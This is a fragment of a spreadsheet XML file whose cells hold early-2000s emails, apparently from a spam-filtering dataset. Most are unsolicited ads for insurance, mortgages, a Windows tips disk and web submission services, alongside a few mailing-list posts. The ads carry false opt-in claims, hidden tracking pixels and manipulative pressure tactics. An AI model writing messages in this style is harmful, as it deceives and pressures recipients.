 249bqbo3HCu4jNix1DPPR"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NL=3De501-01&amp;ISSUE=3D2002-07-19" height=3D1 width=3D1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;=
 tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, sans-serif size=3D2&gt;   =
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;=20
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3Dea-f=
 jpy-XV9-0jGQHL5sWi23hhY99RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Are you protected? Free Life Insurance quote oefik
</t>
  </si>
  <si>
    <t xml:space="preserve">Lowest rates available for term life insurance! 
 Take a moment and fill out our online form to see the low rate you qualify for. 
 Save up to 70% from regular rates! 
 Smokers accepted! 
 http://ww1.bestoffersonthenet.com/termlifequote/
 Representing quality nationwide carriers. Act now!
 ---------------------------------------
 To easily remove your address from the list, go to: 
 http://ww1.bestoffersonthenet.com/stopthemailplease/
 Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: David Friedman: Mail Me the Money!
</t>
  </si>
  <si>
    <t xml:space="preserve">At 6:21 PM +0000 on 8/9/02, Russell Turpin wrote:
 &gt;  Personally,
 &gt; I wouldn't know where to hide the bodies. But if
 &gt; the government didn't have this -- um, fussiness --
 &gt; about shooting vermin, the spam problem would
 &gt; disappear rather quickly.
 ...which reminds me of my favorite David Friedman quote.
 See below...
 Cheers,
 RAH
 -- 
 -----------------
 R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 44 Farquhar Street, Boston, MA 02131 USA
 "The direct use of physical force is so poor a solution to the problem of
 limited resources that it is commonly employed only by small children and
 great nations." -- David Friedman, _The_Machinery_of_Freedom_
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: windows tips
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ARE YOU HAVING TROUBLE WITH YOUR COMPUTER?  THE PROBLEMS MAY NOT BE WITH YOUR COMPUTER?
 As part of a National Marketing Test, we are offering the most amazing Windows Tips. 
 Over 60 ways to improve the performance of your computer. (GUARANTEED)
 You will gain a better understanding of your computer and Windows 95 - 98SE operating system just by using these amazing tips and tricks.
 With this program and its information you will be able to: 
 Increase your computer's resources (Are you at 96%?)
 Search for hidden files
 Keyboard Shortcuts
 Restart your computer faster
 Open programs faster
 Find better ways to free up memory
 New PnP devices
 Find the hidden settings for Windows
 How to make a Restart Icon
 What to do when Windows won't start?
 Memory issues
 INI versus registry
 Changing Logon and Logoff screens
 Did you know you could change the name of your "Start" menu?
 THIS IS ONLY A SAMPLE OF WHAT IS AVAILABLE TO YOU WITH THIS PROGRAM.
 During this special promotion we will be offering this amazing program for just $14.95 postage paid. This is less than half of the suggested retail price of $29.99
 All you will need to run this disk is a Windows based computer and an Internet browser (no need to be connected to the Internet). Sorry no Macintosh version available at this time.
 These are tips and tricks that computer technicians know and now you have all the information available for a low price of only $14.95 postage paid! Software and computer manufacturers don't want you to know these secrets, because they want you to buy their software and/or technology upgrades at very inflated prices.
 This investment of only $14.95 truly outweighs the frustration of a poorly working good computer.
 Gain a better understanding of your computer by using these tips.
 ORDER TODAY FOR YOUR COPY OF THIS AMAZING PROGRAM FOR WINDOWS.
 Postage paid.
 $14.95 US, $19.95 International (U.S dollars)
 (We accept Cash, Check or Money order)
 Make Checks payable to:
 C Chute
 PO Box 6337
 Jacksonville, Fl. 32205-9998
 Please Print Clearly Your Return:
 Name  _______________________________________________________________l31__
 Address _______________________________________________________________       
 City, State, and Zip Code _____________________________________________
 E-mail Address_________________________________________________________   ........................................................................
 This program is fully guaranteed. If you are unhappy just return the disk within 30 days
 And we will refund your money.
 Copyright 2001
 C Chute
 All Rights Reserved
 All REMOVE requests AUTOMATICALLY honored upon receipt. PLEASE understand that any effort to disrupt, close or block this REMOVE account can only result in difficulties for others wanting to be removed from our master mailing list as it will be impossible to take anyone off the list if the remove instruction cannot be received. To be removed from our master mailing list please send an email to 2getoffmylist@start.com.au   and place remove in the subject.
 Thank you:
 PLEASE FORWARD TO EVERYONE YOU KNOW!
 ONE DAY THEY WILL THANK YOU!
 This mailing is done by an independent marketing co.
 We apologize if this message has reached you in error.
 Save the Planet, Save the Trees!  Advertise With
 E-mail.  No wasted paper!   Delete with 
 One simple keystroke!  Less refuse in our Dumps!
 Make it a great day!
 ------------------------------------------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Vacation Time,House need work,Behind in Bills? Refinance while rates are low
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;a href="http://www.directmedium.com/bestrates/"&gt;
 &lt;img border="0" src="http://www.directmedium.com/images/mort19.gif" width="500" height="300"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Arial" size="1"&gt;We are strongly against sending unsolicited emails
 to those who do not wish to receive our special mailings.You have opted in to one or more of our affiliate
 sites requesting to be notified of any special offers we may run from time to
 time. If you do not wish to receive further mailings, please
 &lt;a href="http://www.directmedium.com/remove.htm"&gt;click this link &lt;/a&gt;.
 Please accept our apologies if you have been sent this email in error. We honor
 all removal requests.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 22
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FW: [ILUG] Using Normal IDE Device with a Dell Latitude CPx lapto p
</t>
  </si>
  <si>
    <t xml:space="preserve">I vote usb 1.1 as the chances are the cdr drive is not over 8x write and
 thus fireware is of no real use...
 but i cant see how you are going to get it working without a cradle. I cant
 even get my dell laptop dvd drive to work
 as the connectors are not the same as my cd drive ones.. seems dell cant
 keep any standards going :-(
 -----Original Message-----
 From: Paul Kelly [mailto:longword@esatclear.ie]
 Sent: 28 August 2002 09:32
 To: ilug@linux.ie
 Subject: Re: [ILUG] Using Normal IDE Device with a Dell Latitude CPx
 laptop
 John P. Looney wrote:
 &gt;&gt;There is absolutely no way to use a conventional 3.5" drive with a
 &gt;&gt;laptop directly.
 &gt;  Ah, they told me that about my A1200.
 &gt; 
 &gt;  Worked a charm. Until I dropped the disk one day onto concrete.
 Go on. Tell them how long the /first/ one lasted.
 I vote external firewire if the laptop has the ports for it.
 Paul.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
 DISCLAIMER: The information in this message is confidential and may be
 legally privileged. It is intended solely for the addressee.  Access to this
 message by anyone else is unauthorised.  If you are not the intended
 recipient, any disclosure, copying, or distribution of the message, or any
 action or omission taken by you in reliance on it, is prohibited and may be
 unlawful.  Please immediately contact the sender if you have received this
 message in error. Thank you.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Are you LOSING? The answer would amaze you!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------_NextPart_3402248108
 Content-Type: text/plain; charset="ISO-8859-1"
 Content-Transfer-Encoding: QUOTED-PRINTABLE
       =93Connecting your Business to the World Wide Web=94
 How Many Shoppers are 
 YOU LOSING?
 The figure would AMAZE YOU! 
 HOW are you LOSING them?
 They cannot find your web site!
 A Simple Equation
 NOT Being FOUND =3D Losing new Customers!
  We can change that!
 For ONLY $119.97 
 We will submit your website to over 360 major search engines around the world 
 (See full list on our web site.) 
 But more than that 
 We will research the best and most effective meta tags and keywords to use 
 on your web site so that you will rise in the search engine listings 
 So new customers can FIND YOU!
 Don't lose any more customers!
 Let us professionally manage the submission of your web site 
 and get it FOUND and SEEN on the Worlds Search Engines!
 CLICK ON this link 
 CLICK HERE!
 to discover the POWER of 
  =93Connecting your Business to the World Wide Web=94
 ------_NextPart_3402248108
 Content-Type: text/html; charset="ISO-8859-1"
 Content-Transfer-Encoding: QUOTED-PRINTABLE
 &lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html;charset=3Diso-8859-1"&gt;
 &lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html;charset=3Diso-8859-1"&gt;
 &lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html;charset=3Diso-8859-1"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-gb"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-1252"&gt;
 &lt;title&gt;World Web Connect:::::::::::The Best Web Solutions!!!&lt;/title&gt;
 &lt;base target=3D"contents"&gt;
 &lt;/head&gt;
 &lt;BODY leftMargin=3D0 topMargin=3D0&gt;
 &lt;TABLE id=3DAutoNumber1 style=3D"BORDER-COLLAPSE: collapse" borderColor=3D#111111 
 height=3D33 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"50%" background=3Dhttp://www.worldwebconnect.com/images/fon01.gif 
     height=3D33&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;IMG height=3D35 
       src=3D"http://www.worldwebconnect.com/images/logo.gif" width=3D315 
       border=3D0&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE id=3DAutoNumber2 style=3D"BORDER-COLLAPSE: collapse" borderColor=3D#111111 
 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"41%" 
       background=3Dhttp://www.worldwebconnect.com/images/fon03.gif&gt;&lt;P 
       class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: left" 
       align=3Dcenter&gt;&lt;I&gt;&lt;SPAN lang=3DEN-GB 
       style=3D"FONT-SIZE: 8pt; COLOR: #ffcc00; FONT-FAMILY: Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
       =93Connecting your Business to the World Wide Web=94&lt;/SPAN&gt;&lt;/I&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=3D"59%" background=3Dhttp://www.worldwebconnect.com/images/back.gif&gt;
       &lt;P 
 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=3Dcenter&gt;&lt;IMG height=3D28 
 src=3D"http://www.worldwebconnect.com/images/tn_pic01.gif" width=3D151 border=3D0&gt;&lt;IMG 
 height=3D28 src=3D"http://www.worldwebconnect.com/images/tn_pic02.gif" width=3D138 
 border=3D0&gt;&lt;/P&gt;
 &lt;DIV align=3Dcenter&gt;
 &lt;CENTER&gt;
 &lt;TABLE id=3DAutoNumber3 style=3D"BORDER-COLLAPSE: collapse" borderColor=3D#111111 
 height=3D288 cellSpacing=3D1 width=3D"100%" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"91%" height=3D258&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=3Dcenter&gt;&lt;FONT 
       face=3D"Arial Black" color=3D#ff0000&gt;&lt;SPAN lang=3DEN-US&gt;&lt;STRONG&gt;&lt;FONT size=3D6&gt;How 
       Many Shoppers are&lt;/FONT&gt;&lt;/STRONG&gt;&lt;FONT size=3D6&gt; &lt;/FONT&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=3Dcenter&gt;&lt;FONT 
       face=3D"Arial Black"&gt;&lt;SPAN lang=3DEN-US&gt;&lt;FONT color=3D#ff0000 size=3D7&gt;YOU 
       LOSING?&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/P&gt;
       &lt;P class=3DMsoTitle style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;&lt;FONT 
       color=3D#0000ff&gt;&lt;B&gt;&lt;SPAN lang=3DEN-US&gt;&lt;FONT face=3D"Arial Black" size=3D6&gt;The 
       figure would&amp;nbsp;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;FONT face=3D"Arial Black"&gt;&lt;SPAN 
       lang=3DEN-US&gt;&lt;FONT size=3D6&gt;&lt;I&gt;AMAZE YOU! 
       &lt;/I&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoTitle style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoTitle style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;&lt;FONT 
       face=3DArial&gt;&lt;STRONG&gt;&lt;FONT size=3D6&gt;&lt;SPAN lang=3DEN-US&gt;&lt;FONT 
       color=3D#ff0000&gt;HOW&lt;/FONT&gt; &lt;FONT color=3D#0000ff&gt;are you&amp;nbsp;&lt;/FONT&gt;&lt;FONT 
       color=3D#ff0000&gt;LOSING&lt;/FONT&gt; &lt;FONT 
       color=3D#0000ff&gt;them?&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoBodyText style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;&lt;FONT 
       face=3D"Arial Black" size=3D6&gt;&lt;FONT color=3D#ff0000&gt;&lt;STRONG&gt;They 
       &lt;/STRONG&gt;&lt;/FONT&gt;&lt;FONT color=3D#ff0000&gt;&lt;STRONG&gt;cannot 
       find&lt;/STRONG&gt;&lt;/FONT&gt;&lt;FONT color=3D#ff0000&gt;&amp;nbsp;&lt;STRONG&gt;your web 
       site!&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;SPAN style=3D"FONT-SIZE: 24pt"&gt;&lt;FONT 
       face=3DArial&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3D"Arial Black" color=3D#111111 size=3D7&gt;A Simple 
       Equation&lt;/FONT&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3D"Arial Black" color=3D#111111 
       size=3D5&gt;&lt;STRONG&gt;NOT&amp;nbsp;Being FOUND&lt;/STRONG&gt; &lt;STRONG&gt;=3D&lt;/STRONG&gt; &lt;EM 
       style=3D"FONT-STYLE: normal"&gt;&lt;B&gt;Losing new Customers!&lt;/B&gt;&lt;/EM&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;I&gt;&lt;FONT color=3D#0000ff&gt;&lt;FONT face=3D"Arial Black" 
       size=3D6&gt;&amp;nbsp;&lt;/FONT&gt;&lt;STRONG&gt;&lt;FONT face=3D"Arial Black" size=3D6&gt;We can change 
       that!&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/I&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;H2 style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;&lt;IMG height=3D52 
       src=3D"http://www.worldwebconnect.com/images/worldwebconnect.gif" width=3D425 
       border=3D0&gt;&lt;/H2&gt;
       &lt;H1 style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;&lt;FONT face=3D"Arial Black" 
       color=3D#ff0000&gt;For ONLY &lt;SPAN lang=3Den-us&gt;$119.97&lt;/SPAN&gt; &lt;/FONT&gt;&lt;/H1&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D6&gt;We will submit your 
       website to over 360 major search engines around the world &lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D4&gt;&lt;STRONG&gt;(See full list 
       on our web site.)&lt;/STRONG&gt; &lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3D"Arial Black" color=3D#ff0000 size=3D6&gt;&lt;STRONG&gt;But 
       more than that&lt;/STRONG&gt; &lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D6&gt;We will research the 
       best and most effective meta tags and keywords to use &lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D6&gt;on your web site so 
       that you will rise in the search engine&amp;nbsp;listings &lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;B&gt;&lt;FONT face=3DArial size=3D6&gt;&lt;FONT color=3D#ff0000&gt;So new 
       customers can &lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT size=3D6&gt;&lt;I&gt;&lt;FONT face=3D"Arial Black" 
       color=3D#ff0000&gt;FIND YOU!&lt;/FONT&gt;&lt;/I&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3D"Arial Black" color=3D#ff0000 
       size=3D6&gt;&lt;STRONG&gt;&lt;EM&gt;Don't lose any more customers!&lt;/EM&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;IMG height=3D52 
       src=3D"http://www.worldwebconnect.com/images/worldwebconnect.gif" width=3D425 
       border=3D0&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;B&gt;&lt;EM&gt;&lt;SPAN lang=3Den-us&gt;&lt;FONT face=3DArial size=3D6&gt;Let 
       us&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/EM&gt;&lt;/B&gt;&lt;FONT face=3DArial&gt;&lt;EM&gt;&lt;B&gt;&lt;FONT size=3D6&gt; 
       &lt;/FONT&gt;&lt;/B&gt;&lt;SPAN style=3D"FONT-SIZE: 24pt"&gt;&lt;FONT 
       size=3D6&gt;&lt;B&gt;professionally&lt;/B&gt; &lt;/FONT&gt;&lt;/SPAN&gt;&lt;/EM&gt;&lt;/FONT&gt;&lt;FONT face=3DArial 
       size=3D6&gt;&lt;SPAN style=3D"FONT-STYLE: italic"&gt;&lt;STRONG&gt;manage the submission of 
       your web site &lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;I&gt;&lt;FONT face=3DArial size=3D6&gt;&lt;STRONG&gt;and get 
       it&amp;nbsp;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;FONT face=3DArial&gt;&lt;STRONG&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 24pt"&gt;&lt;FONT color=3D#0000ff 
       size=3D6&gt;FOUND&lt;/FONT&gt;&lt;/SPAN&gt;&lt;FONT size=3D6&gt; and&lt;FONT color=3D#0000ff&gt; 
       &lt;/FONT&gt;&lt;/FONT&gt;&lt;SPAN style=3D"FONT-SIZE: 24pt"&gt;&lt;FONT color=3D#0000ff 
       size=3D6&gt;SEEN&lt;/FONT&gt;&lt;FONT size=3D6&gt; on the&lt;FONT color=3D#0000ff&gt; 
       &lt;/FONT&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;FONT face=3DArial 
       size=3D6&gt;&lt;STRONG&gt;Worlds Search Engines!&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/I&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0cm; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;SPAN style=3D"FONT-SIZE: 24pt"&gt;&lt;FONT 
       face=3DArial&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;&lt;STRONG&gt;&lt;FONT 
       face=3D"Arial Black" size=3D6&gt;CLICK ON&amp;nbsp;this link &lt;/P&gt;&lt;/FONT&gt;&lt;FONT 
       face=3D"Arial Black" color=3D#ff0000 size=3D6&gt;
       &lt;P class=3DMsoNormal style=3D"MARGIN: 0px 0in; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=3D"Arial Black" color=3D#ff0000 size=3D6&gt;&lt;SPAN 
       style=3D"COLOR: red"&gt;&lt;A href=3D"http://www.worldwebconnect.com/"&gt;CLICK 
       HERE!&lt;/A&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;O:P&gt;&lt;/O:P&gt;&lt;/B&gt;&lt;/P&gt;&lt;FONT face=3D"Arial Black" size=3D6&gt;
       &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;to discover 
       the&amp;nbsp;&lt;FONT color=3D#ff0000&gt;&lt;EM&gt;POWER&lt;/EM&gt;&lt;/FONT&gt; of &lt;/P&gt;&lt;/FONT&gt;&lt;FONT 
       face=3DArial size=3D4&gt;
       &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;&lt;IMG height=3D52 
       src=3D"http://www.worldwebconnect.com/images/worldwebconnect.gif" width=3D443 
       border=3D0&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;FONT face=3DArial size=3D5&gt;
       &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;&lt;I&gt;&lt;SPAN 
       lang=3DEN-GB style=3D"COLOR: #ffcc00; FONT-FAMILY: Arial"&gt;&amp;nbsp;=93Connecting 
       your Business to the World Wide Web=94&lt;/SPAN&gt;&lt;/I&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;FONT face=3DArial 
       size=3D4&gt;
       &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0px 0cm" align=3Dcenter&gt;&lt;IMG height=3D32 
       src=3D"http://www.worldwebconnect.com/images/SSLsecure.gif" width=3D82 
       border=3D0&gt;&lt;IMG height=3D30 
       src=3D"http://www.worldwebconnect.com/images/visaetc.gif" width=3D172 
       border=3D0&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/TD&gt;
     &lt;TD width=3D"9%" height=3D258&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;IMG height=3D419 
       src=3D"http://www.worldwebconnect.com/images/rockwell_left_search.gif" 
       width=3D99 border=3D0&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;IMG height=3D419 
       src=3D"http://www.worldwebconnect.com/images/rockwell_left_search.gif" 
       width=3D99 border=3D0&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;IMG height=3D419 
       src=3D"http://www.worldwebconnect.com/images/rockwell_left_search.gif" 
       width=3D99 border=3D0&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"91%" height=3D23&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;TD width=3D"9%" 
 height=3D23&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;
 &lt;/BODY&gt;
 &lt;/html&gt;
 ------_NextPart_3402248108--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Goodbye Global Warming
</t>
  </si>
  <si>
    <t xml:space="preserve">Mr. FoRK:
 &gt;Of the three lying politicians, which liar would you take?
 No, no. The riddle is, asking only one question, how
 do you determine which is which? "If I were to ask
 you whether he would say you were a crook, or if the
 other had sex ..?"
 _________________________________________________________________
 Send and receive Hotmail on your mobile device: http://mobile.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Food bits
</t>
  </si>
  <si>
    <t xml:space="preserve">OK, this site rocks...
 http://www.nal.usda.gov/fnic/foodcomp/Data/SR15/sr15.html
 You are what you eat :)
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Avfs] Romanian Software Production &amp; Export
</t>
  </si>
  <si>
    <t xml:space="preserve">
 To:   avfs@fazekas.hu
 Attn: Marketing Department
 From: I.Q. Software - Bucharest
 Ref.: Romanian Software Production &amp; Export
 ------------------------------------------------------------------------
                  Our anti-spamming company policy:
                       NEVER BOTHER YOU AGAIN
            To remove your E-mail address from the present
            contact list JUST DO NOT REPLY to this message.
  If you receive this message by mistake and/or you are not interested
    in the following brief presentation, please accept our apologies.
 This is a world-wide promotion campaign. The selected E-mail addresses
 are extracted only FROM THE COMMERCIAL WEBSITES of the targeted markets.
 ------------------------------------------------------------------------
 We would like to offer you for consideration our brief presentation.
          We are looking for a marketplace in your country.
              To communicate with us please reply using
          the plain text format in the body of the message
      &gt;&gt;&gt; mentioning your Specific Inquiry/Offering Demand &lt;&lt;&lt;
               and your detailed contact information:
 &gt;&gt;&gt; company name, address, phone &amp; fax numbers, contact person. &lt;&lt;&lt;
      Simple replies and advertisements will not be considered.
                We do not open any PC applications.
 If you answer to this message, we will contact you every 3 months in
 order to update our partners service database. Thank you for your time.
 Best regards,
 I.Q. Software Staff
                       Dear customer,
 Please be so kind and review our Software Production export offer bellow:
                   BRIEF EXPORT PROPOSAL
 Our area of interest is quality Software Production
 export at the lowest prices.
 The capabilities and references listed bellow show the advantages
 obtained by the institutions we worked for.
 WE WOULD LIKE YOU TO SEND US YOUR SPECIFIC INQUIRY/OFFERING DEMAND.
